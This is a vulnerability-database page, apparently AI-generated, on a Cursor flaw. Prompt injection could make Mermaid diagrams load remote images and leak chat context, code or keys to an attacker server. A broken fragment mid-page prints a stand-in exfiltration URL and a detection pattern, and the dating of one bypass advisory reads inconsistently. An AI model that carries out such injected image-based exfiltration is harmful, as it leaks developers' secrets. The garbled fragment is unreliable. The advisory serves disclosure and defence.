
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-61589 is an information leakage vulnerability in Cursor, an AI-powered code editor developed by Anysphere, affecting versions 1.6 and below. The vulnerability arises from Cursor's Mermaid diagram rendering feature, which allows embedding external images in the chat box that can be leveraged to exfiltrate sensitive information to an attacker-controlled server via prompt injection. It was published on October 2–3, 2025, and patched in version 1.7. The CVSS v3.1 base score is 5.9 (Medium) (GitHub Advisory GHSA-xw2x-252g-97w2, Feedly).
The root cause is classified as CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor). Cursor's integration of the Mermaid diagramming library permits embedding remote images in diagrams rendered within the chat interface; when a prompt injection attack is successfully executed — via malicious web content, uploaded images, or source code — the attacker can craft a Mermaid diagram containing an image URL pointing to an attacker-controlled server, causing Cursor to fetch the image and potentially leak sensitive context (e.g., chat history, code snippets, or environment details) as part of the HTTP request. A malicious AI model, hallucination, or backdoored model could also trigger this behavior autonomously. Additional bypasses beyond the initial fix were subsequently discovered and documented in the related advisory GHSA-43wj-mwcc-x93p (CVE-2025-54132), which affected version 1.1.3 and was patched in version 1.3 (GitHub Advisory GHSA-xw2x-252g-97w2, GitHub Advisory GHSA-43wj-mwcc-x93p).
Successful exploitation results in a high confidentiality impact — sensitive information such as source code, chat context, API keys, or other data present in the Cursor session can be silently exfiltrated to an attacker-controlled external server. Integrity and availability are not affected. The attack requires no privileges and no direct user interaction beyond the victim using Cursor with malicious data (e.g., opening a compromised repository or uploading a malicious file), making the exposure risk significant for developers working with untrusted code or content (GitHub Advisory GHSA-xw2x-252g-97w2, Feedly).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Feedly). The EPSS score is approximately 0.041%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a successful prompt injection precondition, raising the attack complexity to High, which limits opportunistic exploitation (GitHub Advisory GHSA-xw2x-252g-97w2).
https://attacker.example.com/exfil?data=<sensitive_info>).GET https://<external-host>/...?data=...) originating from the Cursor process that do not correspond to known CDN or asset domains.The vendor fix in Cursor version 1.7 removes all remote images from Mermaid diagrams before rendering, eliminating the exfiltration vector. Users should upgrade to Cursor 1.7 or later immediately. As interim measures, avoid opening untrusted source files, repositories, or web content within Cursor's AI chat, and monitor outbound network connections from the Cursor process for anomalies (GitHub Advisory GHSA-xw2x-252g-97w2).
The advisory was published by Anysphere's security team (hmwildermuth) on GitHub on October 2, 2025, crediting researcher MaccariTA for the report. The related bypass advisory (GHSA-43wj-mwcc-x93p) credits both wunderwuzzi23 and MaccariTA, indicating iterative security research engagement with the Cursor team. No significant broader media coverage or notable social media discussion has been identified at this time (GitHub Advisory GHSA-xw2x-252g-97w2, GitHub Advisory GHSA-43wj-mwcc-x93p).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."